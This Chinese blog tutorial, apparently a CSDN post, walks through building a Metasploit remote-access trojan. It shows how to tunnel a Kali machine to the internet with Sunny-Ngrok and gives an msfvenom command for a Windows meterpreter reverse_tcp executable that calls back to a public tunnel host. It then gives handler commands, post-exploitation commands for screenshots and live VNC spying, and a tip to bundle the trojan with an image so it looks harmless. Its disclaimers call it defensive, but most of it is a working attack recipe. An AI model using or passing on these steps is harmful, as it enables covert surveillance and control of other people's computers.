一个简单的msf远程渗透实验

原文链接

网络攻防如同打仗 知己知彼百战不殆

要想学会防守必先知道敌人如何进攻

此教程的远端测试全是我的好友帮助测试

并非实际攻击!!!

写一篇远程的渗透教程给大家
当然不是为了教大家去黑别人电脑
而是让大家明白原理,懂得如何防范,再三强调!!!

使用此教程用在不正当地方造成的后果与本人无关!!!

接下来开始本次教程
先给大家展示一下效果吧!基于此程序可以监视对方电脑实时屏幕抓取甚至实时屏幕监测还有创建账户,操控电脑等强悍功能
(功能很多这里就不过赘述了)

所以一般别人给你发的陌生程序千万不要去点!!!!!!!
手机和电脑一个道理,今天就拿电脑端给大家进行讲解,教程中如果出现错误,或者口误的地方,希望大家可以帮我指明,我会积极改正,谢谢大家!!!

不废话了,开始在这里插入图片描述
这个就是通过screenshot命令进行远端屏幕截取的(当时是我的一个朋友帮我进行的远端测试,这是当时他的实时屏幕)

当然还有很多更强悍的命令,在后面再为大家一一介绍。

**首先介绍需要的的工具!!!

(这里就默认大家都有Linux了)

1.MSF本篇文章的重点工具
.在这里插入图片描述

2.Sunny-Ngrok

(内网穿透工具,因为做好的程序需要对方进行回连,而对方又处在外网,所以想要访问你的主机,必须通过内网穿透才可以连接到你的主机,被你监测和控制)

3.win7虚拟机

(这里用作测试用,你可以在自己的物理机里面测试)

一:内网穿透的注册和隧道的使用

第一步打开Sunny官网,超级链接已部署,直接点就可以。然后果断点击注册。
在这里插入图片描述
因为我已经注册过了这里就不给大家演示了,不会注册就直接放弃吧,百度估计也救不了你了。

在这里插入图片描述
接下来直接点击隧道管理,然后点击开通隧道,作为白嫖党,当然不会让你们花钱的,直接拖到最下面

在这里插入图片描述
发现有个0元的,我的天这年头还有免费的,立即购买直接点下去,然后点击确认。

在这里插入图片描述
协议我们选择tcp,隧道名字自己随便取一个,远程端口在10000-11000之间选择,如果被用了的话,旁边有个查看可用端口,点击一下然后随便选取一个就可以。
在这里插入图片描述
接下来还有一个 本地端口,这里就是你虚拟机的端口,我这里是kali ,所以我看一下我kali的本地ip地址,在kali终端中输入 ifconfig 然后看一下你的ip地址如下图。
在这里插入图片描述
然后端口的话,我这里选择的是22端口,所以我填完后信息如下。大家模仿即可。因为我注册过一次,所以这些信息是我的端口的信息,就不再注册了。
在这里插入图片描述
接下来我们为kali下载Sunny的启动端,点击即可。自己下载所对应的版本,因为我的是64位的Linux,所以我之间下载64位的。

wget http://hls.ctopus.com/sunny/linux_amd64.zip?v=2

   
   
  • 1

64位的Linux直接在终端输入以上代码即可下载。下载完后的压缩包在你的主目录中,点开即可看见。
在这里插入图片描述
下载下的文件名字可能会不一样你们自己找一找,然后对文件进行解压缩,将文件就解压缩进主目录即可。
在这里插入图片描述
右键文件夹,提取到此次即可,然后会多出来一个跟压缩包名字一样的文件夹,然后点开进去将里面的Sunny文件移到最外层的目录。
在这里插入图片描述
然后返回你刚刚注册的那个网站,登录上去,然后找见隧道管理,点击然后找见你的id,还有端口,将它们记下来。我这里的端口就是后面的10030.
在这里插入图片描述
然后在一个新的终端中,输入以下命令。

./sunny clientid bbbbdwadawd(这个是你刚刚通道的id)

   
   
  • 1

在这里插入图片描述

出现这个界面证明你的内网穿透服务正常启动了,到此内网渗透的大部分工作完成了,接下来我们制作远程木马。

二.利用MSF制作远程木马

这步相对教为简单,大家按命令输入即可。
新开一个终端窗口

msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp  LHOST=free.idcfengye.com LPORT=10030 -f exe -o 木马名称.exe

   
   
  • 1

这里的LHOST=后面的值不需要改,
LPORT=后面的值改为刚刚注册网页的隧道端口(就是第一个提示在10000-11000之间选择的那个端口)
木马名称自己写一个就好。

在这里插入图片描述
出现如下提示证明你的木马生成成功了,就在你的主目录下面。
在这里插入图片描述
这个就是我生成的木马,到这里木马就制作完成了,然后接下将这个木马移到我们测试的主机中,我这里是用win7测试的,所以以win7为例。

三.利用MSF和win7测码

至于如何将文件从Linux中移出来,且移到其它地方,这里就不再赘述了,本白这里用的是 Vm Tools ,当然方法有很多,个人认为这个比较无脑点,哈哈哈。

在这里插入图片描述
我把文件名字改成了成品,看的舒服点 ,哈哈哈。

然后切回到我们的linx界面
在终端中挨个输入如下命令

msfconsole

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 192.168.187.131 //这个就是你刚刚网站的填写的IP

set lport 22 //这个就是刚刚IP后面跟着的端口

exploit

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11

以上命令请一条一条运行 !!!

运行完这些命令后你会出现如下界面
在这里插入图片描述
然后返回我们的win7,运行刚刚的木马程序。
在这里插入图片描述
出现这个界面证明对方上线了,此时你就可以进行操控了。

execute -f calc.exe

 
 
  • 1

打开对方电脑的计算器。
在这里插入图片描述
这边提示创建成功,打开我们的win7看一下。

在这里插入图片描述
果不其然,win7的计算器自己开启了,然而这条命令只是冰山一角,命令还有好多,这里就不给大家测了,给大家写几条常用的吧。

sysinfe   //  查看对面电脑配置

screenshot //屏幕截图 截取对方电脑的屏幕

run vnc //实时监控对面屏幕

execute -f calc.exe //开计算器

  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8

因为这只是教大家原理和简单的方法,好多命令这里就不给大家说了,大家可以自行百度什么的。这个木马因为有了内网穿透是可以进行远端执行的。

当然这个木马,检测是肯定过不了的,不要想着怎么去坑害别人,
一定要坚守正义!!!!
一定要坚守正义!!!!
一定要坚守正义!!!!

至于如何过检测软件,大家就自己去摸索吧,这里不教给大家了,如果是为了给朋友发去,然后装X的话,你可以和一个图片什么的捆绑起来,看起来 就 有内味了,这里简单捆绑了一下,给大家看下效果。
在这里插入图片描述
点击软件后会出现上面的图片,闪一下,当然这需要提前将照片打包成 .exe 的格式的文件。好了好了 就写这么多了。

~
~
一个对网安疯狂热爱的小白的学习经验

希望能够让想学习网安的人提起一些兴趣

如果文章中有错误,或者不妥的地方请直接在评论中指明,本白会积极修改,还有就是想找个大佬带带我 毕竟一个学还是毕竟难的
~
~

如果你学到了一些东西请帮忙点个赞
真的很重要
谢谢大家

在这里插入图片描述

  • 3
    点赞
  • 18
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值